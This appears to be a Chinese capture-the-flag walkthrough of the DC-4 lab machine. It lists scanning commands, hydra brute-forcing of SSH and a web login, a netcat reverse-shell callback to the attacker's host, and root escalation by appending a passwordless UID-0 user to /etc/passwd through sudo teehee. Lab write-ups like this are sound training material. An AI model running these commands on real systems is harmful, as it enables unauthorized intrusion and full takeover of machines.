仅供个人娱乐

靶机信息

下载地址:http://www.five86.com/downloads/DC-4.zip

一、主机扫描

arp-scan -l

nmap -p 1-65535 -A -sV 192.168.17.130

DC-4靶机

二、信息收集

dirb http://192.168.17.130

DC-4靶机
DC-4靶机
DC-4靶机
DC-4靶机
DC-4靶机

三、漏洞查找和利用

爆破ssh

hydra -L /root/user.txt -P /root/rockyou.txt -t 5 ssh://192.168.17.130

DC-4靶机

字典设置太大了。

web页面

DC-4靶机

爆破

DC-4靶机
DC-4靶机

或者使用hydra 爆破密码

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.17.130 http-post-form "/login.php:username=^USER^ password=^PASS^:S=logout" -F

登录成功

DC-4靶机

信息收集

DC-4靶机

抓包

DC-4靶机
DC-4靶机
DC-4靶机
DC-4靶机

可以反弹shell命令:

nc -e /bin/bash 192.168.17.129 4444

DC-4靶机
DC-4靶机

python -c 'import pty;pty.spawn("/bin/bash")'

DC-4靶机

信息收集

DC-4靶机
DC-4靶机

复制 作为字典

DC-4靶机

ssh登录

DC-4靶机

查看信息

DC-4靶机
DC-4靶机

切换账户登录[charles:^xHhA&hvim0y]

DC-4靶机

查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee

DC-4靶机

信息收集

DC-4靶机

第一种获取权限方法

添加账户

echo test::0:0:::/bin/bash | sudo teehee -a /etc/passwd

tail -n 5 /etc/passwd

su test

DC-4靶机
DC-4靶机

相关文章:

  • 2021-05-20
  • 2021-06-01
  • 2021-08-26
  • 2021-07-17
  • 2021-12-25
  • 2021-06-26
  • 2021-07-07
猜你喜欢
  • 2021-08-16
  • 2021-08-06
  • 2021-04-05
  • 2021-12-22
  • 2021-04-23
  • 2021-05-31
  • 2021-12-26
相关资源
相似解决方案